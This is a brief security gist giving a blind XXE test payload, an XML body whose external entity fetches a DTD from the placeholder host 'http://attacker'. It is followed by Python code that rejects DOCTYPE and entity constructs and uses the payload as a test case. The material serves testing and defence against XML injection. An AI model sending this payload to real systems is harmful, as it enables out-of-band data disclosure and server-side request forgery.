@mgeeky
Created April 25, 2017 11:35
Simplest Blind XXE Payload to test within HTTP request
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>
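
On the receiving side, a parser that refuses any DOCTYPE stops the request above before entity processing starts. The following is an added example, not part of the original gist, using Python's standard-library expat binding; the names parse_untrusted and ForbiddenXML and the benign sample document are assumptions made for illustration:

```python
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """Raised when a document uses a construct the policy rejects."""


def parse_untrusted(xml_bytes):
    """Parse XML with expat, rejecting DOCTYPE and entity constructs.

    Returns the element names seen, in document order. Malformed XML
    still raises xml.parsers.expat.ExpatError as usual.
    """
    elements = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at "<!DOCTYPE name", before the internal subset is read.
        raise ForbiddenXML(f"DOCTYPE declaration not allowed: {name}")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML(f"entity declaration not allowed: {name}")

    def on_external_ref(context, base, sysid, pubid):
        # Defence in depth: never resolve a SYSTEM identifier.
        raise ForbiddenXML(f"external entity reference not allowed: {sysid}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(xml_bytes, True)
    return elements


# The request body from this gist, reproduced as test input.
GIST_BODY = (b'<?xml version="1.0" encoding="utf-8"?>'
             b'<!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM '
             b'"http://attacker/test.dtd">]><foo>&xxetest;</foo>')
# Constructed benign document with the same root element.
BENIGN_BODY = b'<?xml version="1.0" encoding="utf-8"?><foo>hello</foo>'

if __name__ == "__main__":
    print(parse_untrusted(BENIGN_BODY))
    try:
        parse_untrusted(GIST_BODY)
    except ForbiddenXML as exc:
        print("rejected:", exc)
```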